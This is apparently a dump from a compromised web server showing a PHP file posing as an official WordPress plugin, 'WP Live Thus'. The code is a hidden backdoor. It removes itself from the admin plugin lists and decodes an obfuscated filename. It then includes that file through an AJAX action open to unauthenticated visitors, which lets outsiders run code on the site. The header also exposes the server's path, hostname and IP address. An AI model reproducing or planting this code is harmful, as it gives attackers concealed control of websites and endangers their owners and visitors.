PK œqhYî¶J‚ßF ßF ) nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
| Dir : /home/ngamzghe/fravisto.com/wp-content/plugins/wp-live-thus/ |
| Server: Linux server1.ngambekcore.com 4.18.0-553.51.1.el8_10.x86_64 #1 SMP Wed Apr 30 04:00:07 EDT 2025 x86_64 IP: 159.198.77.92 |
| Dir : /home/ngamzghe/fravisto.com/wp-content/plugins/wp-live-thus/wp-live-thus.php |
<?php
/*
Plugin Name: WP Live Thus
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 16.9.9
Author URI: http://wordpress.org/#
*/
if (!defined('ABSPATH')) {
exit;
}
function xhg_xvz() {
global $wp_list_table;
if (!isset($wp_list_table)) {
return;
}
$u = array('wp-live-thus/wp-live-thus.php');
if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
foreach ($wp_list_table->items as $key => $val) {
if (in_array($key, $u)) {
unset($wp_list_table->items[$key]);
}
}
}
}
function hvw_vjf($plugins) {
$v = 'wp-live-thus/wp-live-thus.php';
if (array_key_exists($v, $plugins)) {
unset($plugins[$v]);
}
return $plugins;
}
function mtl($n, $c) {
$f = '';
for ($h = 0; $h < strlen($n); $h += 2) {
$e = ord($n[$h]) - 65;
$a = ord($n[$h + 1]);
if ($a > 90) $a -= 6;
$l = $e * 52 + ($a - 65);
$f .= chr($l - $c);
}
return $f;
}
function enh_ajax_handler() {
include plugin_dir_path(__FILE__) . mtl('EcErErDdEeEuEu', 139);
die();
}
if (defined('ABSPATH')) {
add_action('pre_current_active_plugins', 'xhg_xvz');
add_filter('all_plugins', 'hvw_vjf');
add_action('wp_ajax_liv_thu', 'enh_ajax_handler');
add_action('wp_ajax_nopriv_liv_thu', 'enh_ajax_handler');
}